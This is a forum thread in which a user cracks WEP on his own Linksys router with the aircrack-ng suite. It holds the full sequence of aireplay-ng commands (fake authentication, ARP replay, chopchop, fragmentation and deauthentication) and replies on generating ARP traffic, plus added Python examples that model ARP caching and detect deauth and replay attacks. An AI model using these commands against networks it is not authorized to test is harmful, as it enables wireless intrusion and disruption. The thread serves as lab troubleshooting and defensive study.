Thread: Cant get PRGA for WEP crack...

  1. #1
    Just burned his ISO
    Join Date
    Oct 2012
    Posts
    5

    Cant get PRGA for WEP crack...


    "airmon-ng start wlan0"
    "airodump-ng mon0"

    ESSID: Linksys01
    BSSID: xx:xx:xx:xx:xx:xx
    Channel: 6

    "iwconfig wlan0 channel 6"
    "iwconfig mon0 channel 6"

    "airodump-ng mon0 -c 6 --bssid xx:xx:xx:xx:xx:xx"

    ...sniffing starts

    "aireplay-ng -1 0 -e Linksys01 -a xx:xx:xx:xx:xx:xx -h mm:mm:mm:mm:mm:mm"

    "Sending Authentication Request
    Authentication successful
    Sending Association Request
    Association successful :-)"

    [Can see my MAC show up under stations on airodump-ng sniff]
    [AUTH changes to OPN]

    ---------------------------------

    At this point I'm confused/stuck... I perform "ls" in /root, but no .xor file.

    I tried arpreply attack...

    "aireplay-ng -3 -b xx:xx:xx:xx:xx:xx mon0"

    It will continue to read packets and go nowhere.

    I tried a Chop Chop...

    "aireplay-ng -4 -b xx:xx:xx:xx:xx:xx -h mm:mm:mm:mm:mm:mm mon0"

    It will continue to read packets and go nowhere.

    I tried fragmentation...

    "aireplay-ng -5 -b xx:xx:xx:xx:xx:xx -h mm:mm:mm:mm:mm:mm mon0"

    It will continue to read packets and go nowhere.

    Tested packet injection (works). Tried keeping my MAC the same and changing it. I even tried restarting and rebooting my VMware. Same thing. I find it odd that AUTH never changes to SKA.


    Any ideas?


    ===============================================
    ROUTER: Linksys WRT54G w/DD-WRT v24 sp2
    VMware player 5.0.0 build-812388 (4gig ram, 2 processors, 30 gig hard drive, Bridged network adapter)
    Back Track 5r3
    Alfa AWUS036H
    IBM x230

  2. #2
    Junior Member rastamouse's Avatar
    Join Date
    Oct 2012
    Posts
    32

    Many of these aireplay attacks will prompt you to confirm the use of a packet before it is used for an attack. Since this is not happening for any of your attacks, I would suggest that there are no data packets being broadcast. When conducting these exercises, I would recommend having at least one wired or wireless client on the network to generate traffic (for example by pinging non-existing hosts to generate ARPs).
    Last edited by rastamouse; 11-05-2012 at 05:51 AM.

  3. #3
    Moderated Member
    Join Date
    Oct 2011
    Posts
    44

    Yeah, start using automated Wifi crackers; hackpack's airpwn, Gerix, etc. Easy, simple, fast.

  4. #4
    Just burned his ISO
    Join Date
    Oct 2012
    Location
    Underneath The Flying Spaghetti Monster.
    Posts
    3

    I don't know your ultimate goal, but here is a thread that may help a bit.

    http://www.backtrack-linux.org/forum...ad.php?t=42602

  5. #5
    Just burned his ISO
    Join Date
    Oct 2012
    Posts
    5

    Thanks.

    I didn't have a computer on the network. I have set up a laptop with a wireless connection, and just sent a continuous ping to the router's IP. New problem.

    Arp-reply
    ----------

    Read {packets} packets (got 0 ARP requests and 0 ACKs), sent 0 packets...(0 pps)

    (will continue to do this forever until I Ctrl+C)

    Fragmentation
    --------------

    aireplay-ng -5 -b {BSSID} mon0

    Finds a packet

    I select "y" to use packet
    "Sending fragmented packet"
    "Got a deauthentication packet"
    "not enough acks, repeating..."
    "Trying a LLC NULL packet"

    It will repeat this till "still nothing, trying another packet"

    and I repeat the process.

    Chop Chop
    ----------

    aireplay-ng -4 -b {BSSID} mon0

    Finds a packet

    I select "y" to use packet

    got several deauthentication packets - pausing 3 seconds for reconnection
    got several deauthentication packets - pausing 3 seconds for reconnection
    got several deauthentication packets - pausing 3 seconds for reconnection

    The chopchop attack appears to have failed

  6. #6
    Junior Member rastamouse's Avatar
    Join Date
    Oct 2012
    Posts
    32

    Taking a second look at some of the commands you've been using, I've noticed you are omitting the -w argument in airodump. This tells airodump to write all captured data to a file, which you will need to do if you want to obtain the WEP key later on. This isn't a solution to your problem - but one you will run into later.

    Pinging the router IP continuously is unlikely to generate new ARPs, since the relevant details for this host are already stored in your client's ARP table. Try pinging an address that is not being used; this will cause a new ARP as the client tries to establish an IP-MAC address relationship for that host (even though it doesn't exist).

    Make sure you are already sniffing and listening for ARPs - as soon as you try and ping this non-existent host, BT should detect the ARP.
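
The ARP-cache behaviour described in the post above, as an added example that is not part of the original thread. It is a simplified model of a host's cache, not a real network stack; the IP and MAC addresses and the 60-second cache lifetime are constructed assumptions.

```python
from dataclasses import dataclass, field

ARP_TTL = 60.0  # assumed cache lifetime in seconds; real stacks vary


@dataclass
class Client:
    """Toy model of one host's ARP cache (illustrative only)."""
    live_hosts: dict                               # ip -> mac for hosts that answer ARP
    cache: dict = field(default_factory=dict)      # ip -> (mac, expiry time)
    arp_sent: list = field(default_factory=list)   # (time, ip) per ARP broadcast

    def ping(self, ip, now):
        entry = self.cache.get(ip)
        if entry and entry[1] > now:
            # Mapping already known: the echo request goes out with no ARP.
            return "echo sent (cache hit, no ARP)"
        # No valid entry: broadcast "who-has <ip>" on the segment.
        self.arp_sent.append((now, ip))
        mac = self.live_hosts.get(ip)
        if mac is None:
            # Nobody answers, so nothing is cached and the next ping asks again.
            return "no ARP reply, nothing cached"
        self.cache[ip] = (mac, now + ARP_TTL)
        return "echo sent (ARP resolved)"


def count_arps(target, pings=30, interval=1.0):
    """Number of ARP broadcasts caused by `pings` pings sent `interval` s apart."""
    client = Client(live_hosts={"192.168.1.1": "00:11:22:33:44:55"})  # constructed router
    for i in range(pings):
        client.ping(target, now=i * interval)
    return len(client.arp_sent)


if __name__ == "__main__":
    print("router :", count_arps("192.168.1.1"))    # cached after the first reply
    print("unused :", count_arps("192.168.1.250"))  # never resolves, asks every time
```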

  7. #7
    Just burned his ISO
    Join Date
    Oct 2012
    Posts
    5

    SOLVED:

    Thank you rastamouse, I did forget to incorporate -w into my commands. Also, the problem seemed to be I wasn't performing a --deauth on the router.

    "aireplay-ng -0 5 -a {BSSID} mon0"

    Once I had my airodump-ng locked onto the channel, and performed a --deauth, I was able to sniff the correct packets.
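
Seen from the monitoring side, the sequence in this thread (a deauthentication burst followed by replayed traffic) leaves two simple traces: many deauth frames for one BSSID in a short window, and one WEP IV repeated far more often than normal traffic would repeat it, because a replayed frame is resent unchanged. The sketch below is an added example, not code from the thread or from aircrack-ng; the frame records, station names, and thresholds are constructed assumptions.

```python
from collections import Counter, defaultdict


def build_sample():
    """Constructed records, not a real capture: (time_s, kind, src, bssid, wep_iv)."""
    ap, sta, other = "AP:00", "STA:01", "STA:02"
    frames = [(0.0, "data", sta, ap, "a1b2c3"), (0.4, "data", sta, ap, "a1b2c4")]
    frames += [(1.0 + i * 0.05, "deauth", ap, ap, None) for i in range(5)]
    frames += [(2.0, "data", sta, ap, "0f0e0d")]  # client reconnects and sends a frame
    # The same encrypted frame resent unchanged, so the IV never advances.
    frames += [(2.1 + i * 0.002, "data", other, ap, "0f0e0d") for i in range(400)]
    return frames


def deauth_bursts(frames, window=1.0, threshold=5):
    """BSSIDs with at least `threshold` deauth frames inside any `window` seconds."""
    times = defaultdict(list)
    for t, kind, _src, bssid, _iv in frames:
        if kind == "deauth":
            times[bssid].append(t)
    hits = set()
    for bssid, ts in times.items():
        ts.sort()
        lo = 0
        for hi, t in enumerate(ts):
            while t - ts[lo] > window:   # slide the window start forward
                lo += 1
            if hi - lo + 1 >= threshold:
                hits.add(bssid)
    return hits


def replayed_ivs(frames, threshold=50):
    """(bssid, iv) pairs seen at least `threshold` times, with their counts."""
    counts = Counter(
        (bssid, iv) for _t, kind, _src, bssid, iv in frames if kind == "data" and iv
    )
    return {key: n for key, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    sample = build_sample()
    print("deauth burst on:", deauth_bursts(sample))
    print("replayed IVs   :", replayed_ivs(sample))
```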
